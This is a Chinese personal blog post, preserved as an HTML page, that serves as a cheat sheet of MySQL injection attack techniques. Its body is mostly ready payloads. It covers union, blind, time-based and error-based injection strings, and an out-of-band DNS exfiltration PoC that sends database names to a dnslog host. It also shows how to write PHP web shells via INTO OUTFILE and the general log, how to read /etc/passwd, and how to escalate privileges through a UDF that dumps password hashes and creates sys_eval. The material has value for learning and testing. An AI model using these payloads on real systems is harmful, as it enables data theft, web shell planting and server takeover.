<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"yaoa.cool","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":false,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="UNION注入 Select col form table union select database();  如果前面的值为空，只返回后面的结果。如若查询结果只能显示一条，可以用limit 0,1 或select group_concat(col)进行拼接">
<meta property="og:type" content="article">
<meta property="og:title" content="sql注入手法">
<meta property="og:url" content="http://yaoa.cool/2020/12/23/sql%E6%B3%A8%E5%85%A5%E6%89%8B%E6%B3%95/index.html">
<meta property="og:site_name" content="Ya0a">
<meta property="og:description" content="UNION注入 Select col form table union select database();  如果前面的值为空，只返回后面的结果。如若查询结果只能显示一条，可以用limit 0,1 或select group_concat(col)进行拼接">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2020-12-22T17:00:49.000Z">
<meta property="article:modified_time" content="2020-12-22T17:37:08.791Z">
<meta property="article:author" content="Ya0a">
<meta property="article:tag" content="web">
<meta property="article:tag" content="渗透">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://yaoa.cool/2020/12/23/sql%E6%B3%A8%E5%85%A5%E6%89%8B%E6%B3%95/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>sql注入手法 | Ya0a</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Ya0a</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
      <p class="site-subtitle" itemprop="description">痛定思痛</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://yaoa.cool/2020/12/23/sql%E6%B3%A8%E5%85%A5%E6%89%8B%E6%B3%95/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/uploads/avatar.jpg">
      <meta itemprop="name" content="Ya0a">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Ya0a">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          sql注入手法
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2020-12-23 01:00:49 / 修改时间：01:37:08" itemprop="dateCreated datePublished" datetime="2020-12-23T01:00:49+08:00">2020-12-23</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/web/" itemprop="url" rel="index"><span itemprop="name">web</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="UNION注入"><a href="#UNION注入" class="headerlink" title="UNION注入"></a>UNION注入</h2><ul>
<li><code>Select col form table union select database();</code></li>
</ul>
<p>如果前面的值为空，只返回后面的结果。<br>如若查询结果只能显示一条，可以用limit 0,1 或select group_concat(col)进行拼接</p>
<a id="more"></a>
<h2 id="盲注"><a href="#盲注" class="headerlink" title="盲注"></a>盲注</h2><ul>
<li>返回true或false</li>
</ul>
<p><code>1&#39;%20and%20ascii(substr((select%20database()),1,1))&gt;115--+</code></p>
<p>通过ascii字符截取判断</p>
<ul>
<li><p><code>select * from users order by rand(True)</code></p>
<p> <code>select * from users order by rand(False)</code></p>
</li>
</ul>
<p>返回的结果不同，利用rand(database()=’users’).</p>
<!-- more -->
<ul>
<li><p>时间盲注</p>
<ul>
<li><p>利用sleep()</p>
<pre><code>id=&#39; or if(ascii(substr(database(),1,1))&gt;114,sleep(3),0)%23

if(exp,sleep(3),0)，根据返回的时间来判断exp中是否为真；</code></pre>
</li>
<li><p>利用大量运算模拟sleep()</p>
<pre><code>id=&#39; or if(ascii(substr(database(),1,1))&gt;114,benchmark(10000000,sha(1)),0)%23</code></pre>
</li>
<li><p>通过笛卡尔积</p>
<pre><code>select balabala from table1 where &#39;1&#39;=&#39;2&#39; or if(ascii(substr(database(),1,1))&gt;0,(select count(*) from information_schema.tables A,information_schema.tables B,information_schema.tables C),0)</code></pre>
</li>
<li><p>rlike+rpad</p>
<pre><code>rpad(1,349525,a)是指用a填充第一位的字符串以达到第二位的长度

select * from table1 where 1=1 and if(mid(user(),1,1)=&#39;r&#39;,concat(rpad(1,349525,&#39;a&#39;),rpad(1,349525,&#39;a&#39;),rpad(1,349525,&#39;a&#39;)) RLIKE &#39;(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+(a.*)+asdasdsadasd&#39;,1);</code></pre>
</li>
<li><p>DNSlog无回显盲注</p>
<pre><code>需要windows平台

在mysql中load_file会带dns查询请求

查看变量确定权限

`show variables like &#39;%secure%&#39;`

   1、当secure_file_priv为空，就可以读取磁盘的目录。

   2、当secure_file_priv为G:\，就可以读取G盘的文件。

   3、当secure_file_priv为null，load_file就不能加载文件。

需要secure_file_priv=&quot;&quot;

5.5.34版本后默认为null，可以在my.ini中修改

unc共享路径  `\\\\xq17.com\tet，\\\\转义后为\\`

dnslog平台：http://dnslog.cn/

poc :`&#39; and if((select load_file(concat(&#39;\\\\&#39;,(select database()),&#39;.xxxx.ceye.io\\abc&#39;))),1,0)--+`

poc :`select load_file(concat(&#39;\\\\&#39;,(select database()),&#39;.f9bbk4.dnslog.cn\\abc&#39;));`

注:域名后必须加\\\abc</code></pre>
</li>
</ul>
</li>
</ul>
<h2 id="报错注入"><a href="#报错注入" class="headerlink" title="报错注入"></a>报错注入</h2><p><code>1&#39; and updatexml(1,concat(&#39;^&#39;,(select database()),&#39;^&#39;),1)--+</code></p>
<p><code>1&#39; and extractvalue(1,concat(&#39;^&#39;,(select database()),&#39;^&#39;))--+</code></p>
<p><code>select 1/0</code></p>
<p><code>select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a</code></p>
<p><code>exp(~(SELECT * from(select user())a))</code></p>
<p><code>ST_LatFromGeoHash((select * from(select * from(select user())a)b))</code></p>
<p><code>GTID_SUBSET(version(), 1)</code></p>
<h2 id="二次注入"><a href="#二次注入" class="headerlink" title="二次注入"></a>二次注入</h2><ol>
<li><p>攻击者在HTTP请求中提交某种经过构思的输入。</p>
</li>
<li><p>应用存储该输入(通常保存在数据库中)以便后面使用并响应请求。</p>
</li>
<li><p>攻击者提交第二个(不同的)请求。</p>
</li>
<li><p>为处理第二个请求，应用会检索已经存储的输入并处理它，从而导致攻击者注入的SQL查询被执行。</p>
</li>
<li><p>如果可行的话，会在应用对第二个请求的响应中向攻击者返回查询结果。</p>
<h2 id="宽字节注入"><a href="#宽字节注入" class="headerlink" title="宽字节注入"></a>宽字节注入</h2></li>
</ol>
<ul>
<li>在编码为GBK时，如果waf转义单引号，通过%df‘转义为 運’，绕过转义</li>
</ul>
<h2 id="堆叠注入"><a href="#堆叠注入" class="headerlink" title="堆叠注入"></a>堆叠注入</h2><p><code>;select 1</code></p>
<h2 id="文件读写"><a href="#文件读写" class="headerlink" title="文件读写"></a>文件读写</h2><ul>
<li><p>查看权限</p>
<p> 1） mysql.user 表的file_priv字段</p>
<p> 2） secure_file_priv变量</p>
</li>
<li><p>读文件</p>
<ul>
<li>select load_file(path);</li>
<li>load data infile “/etc/passwd” into table 库里存在的表名 FIELDS TERMINATED BY ‘n’; #读取服务端文件 </li>
</ul>
</li>
<li><p>写文件</p>
<ul>
<li>select 1,”<?php eval($_POST['cmd']);?>“ into outfile ‘/var/www/html/1.php’;</li>
<li>select 2,”<?php eval($_POST['cmd']);?>“ into dumpfile ‘/var/www/html/1.php’;     可写二进制文件</li>
</ul>
</li>
<li><p>没有权限时，通过日志文件写入shell</p>
<ul>
<li>SET GLOBAL general_log = “ON”<br>SET global general_log_file=’D:/phpstudy_pro/WWW/shell.php’;<br>SELECT ‘<?php assert($_GET["admin"]);?>‘;</li>
</ul>
</li>
</ul>
<h2 id="sql约束攻击"><a href="#sql约束攻击" class="headerlink" title="sql约束攻击"></a>sql约束攻击</h2><pre><code>  Mysql中，数据格式为varchar(20)中，插入时会截取前20个字符，搜索时会将末尾的空格去掉，所以注册一个‘admin’和‘admin                      1’时，数据中存储的数据为‘admin’和‘admin                 ‘。搜索admin用户时，会将’admin             ‘后的空格去掉再匹配，所以会返回两个结果，一般默认取第一个。攻击者可以使用原始身份登录。</code></pre>
<h2 id="UDF提权"><a href="#UDF提权" class="headerlink" title="UDF提权"></a>UDF提权</h2><ul>
<li><p>条件</p>
<ul>
<li>有插件写入权限</li>
<li>有mysql root账号密码</li>
</ul>
</li>
<li><p>查找用户密码</p>
<ul>
<li><p>MySQL 5.6及以下版本</p>
<pre><code>select host, user, password from mysql.user;</code></pre>
</li>
<li><p>MySQL 5.7及以上版本</p>
<pre><code>select host, user, authentication_string from mysql.user;</code></pre>
</li>
</ul>
</li>
<li><p>查看mysql和操作系统结构</p>
<pre><code>select @@version_compile_os, @@version_compile_machine;</code></pre>
</li>
<li><p>UDF</p>
</li>
</ul>
<pre><code>  MySQL 5.0.67开始，UDF库必须包含在plugin文件夹中，可以使用@@plugin_dir’全局变量找到它。这个变量可以在mysql.ini文件中看到和编辑。
  如果为空：
  plugin_dir的值为空，则参照5.0.67之前即文件必须位于系统动态链接器的搜索目录中
  5.0&lt;=mysql&lt;5.0.67，则需要导出至目标服务器的系统目录
  @@ DATADIR
  @@ BASEDIR \ BIN
  C：\ WINDOWS
  C：\ WINDOWS \ SYSTEM
  C：\ WINDOWS \ SYSTEM32</code></pre>
<ul>
<li><p>查找plugin文件夹</p>
<ul>
<li>select @@plugin_dir</li>
<li>show variables like ‘plugin%’;</li>
</ul>
</li>
<li><p>更改插件默认目录</p>
<ul>
<li><p><code>mysqld.exe –plugin-dir=C:\\temp\\plugins\\</code></p>
</li>
<li><p><code>mysqld.exe --defaults-file=C:\\temp\\my.ini</code></p>
</li>
</ul>
</li>
<li><p>上传二进制文件</p>
<ul>
<li><p>load_file()可以使用网络文件</p>
<pre><code>select load_file(&#39;\\\\192.168.0.19\\network\\lib_mysqludf_sys_64.dll&#39;) into dumpfile &quot;D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll&quot;;</code></pre>
</li>
<li><p>使用16进制编码</p>
<pre><code>select 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000000… into dump file &quot;D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll&quot;;</code></pre>
</li>
<li><p>创建一个表存储二进制数据，分次插入</p>
<pre><code>create table temp(data longblob);

insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);

update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);

select data from temp into dump file &quot;D:\\MySQL\\mysql-5.7.21-winx64\\mysql-5.7.21-winx64\\lib\\plugin\\udf.dll&quot;;</code></pre>
</li>
<li><p>利用root账号创建函数</p>
<pre><code>create function sys_eval returns string soname &#39;lib_mysqludf_sys_64.so&#39;;</code></pre>
</li>
<li><p>验证</p>
<pre><code>select * from mysql.func where name = &#39;sys_eval&#39;;</code></pre>
</li>
</ul>
</li>
</ul>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/web/" rel="tag"># web</a>
              <a href="/tags/%E6%B8%97%E9%80%8F/" rel="tag"># 渗透</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2020/12/23/sql%E6%B3%A8%E5%85%A5bypass/" rel="prev" title="sql注入bypass">
      <i class="fa fa-chevron-left"></i> sql注入bypass
    </a></div>
      <div class="post-nav-item">
    <a href="/2020/12/23/sql%E6%B3%A8%E5%85%A5%E5%B8%B8%E7%94%A8%E7%9F%A5%E8%AF%86/" rel="next" title="sql注入备忘录">
      sql注入备忘录 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#UNION%E6%B3%A8%E5%85%A5"><span class="nav-number">1.</span> <span class="nav-text">UNION注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E7%9B%B2%E6%B3%A8"><span class="nav-number">2.</span> <span class="nav-text">盲注</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%8A%A5%E9%94%99%E6%B3%A8%E5%85%A5"><span class="nav-number">3.</span> <span class="nav-text">报错注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E4%BA%8C%E6%AC%A1%E6%B3%A8%E5%85%A5"><span class="nav-number">4.</span> <span class="nav-text">二次注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%AE%BD%E5%AD%97%E8%8A%82%E6%B3%A8%E5%85%A5"><span class="nav-number">5.</span> <span class="nav-text">宽字节注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%A0%86%E5%8F%A0%E6%B3%A8%E5%85%A5"><span class="nav-number">6.</span> <span class="nav-text">堆叠注入</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%96%87%E4%BB%B6%E8%AF%BB%E5%86%99"><span class="nav-number">7.</span> <span class="nav-text">文件读写</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#sql%E7%BA%A6%E6%9D%9F%E6%94%BB%E5%87%BB"><span class="nav-number">8.</span> <span class="nav-text">sql约束攻击</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#UDF%E6%8F%90%E6%9D%83"><span class="nav-number">9.</span> <span class="nav-text">UDF提权</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Ya0a"
      src="/uploads/avatar.jpg">
  <p class="site-author-name" itemprop="name">Ya0a</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">8</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Ya0a</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script size="300" alpha="0.6" zIndex="-1" src="/lib/canvas-ribbon/canvas-ribbon.js"></script>
  <script src="/lib/anime.min.js"></script>

<script src="/js/utils.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
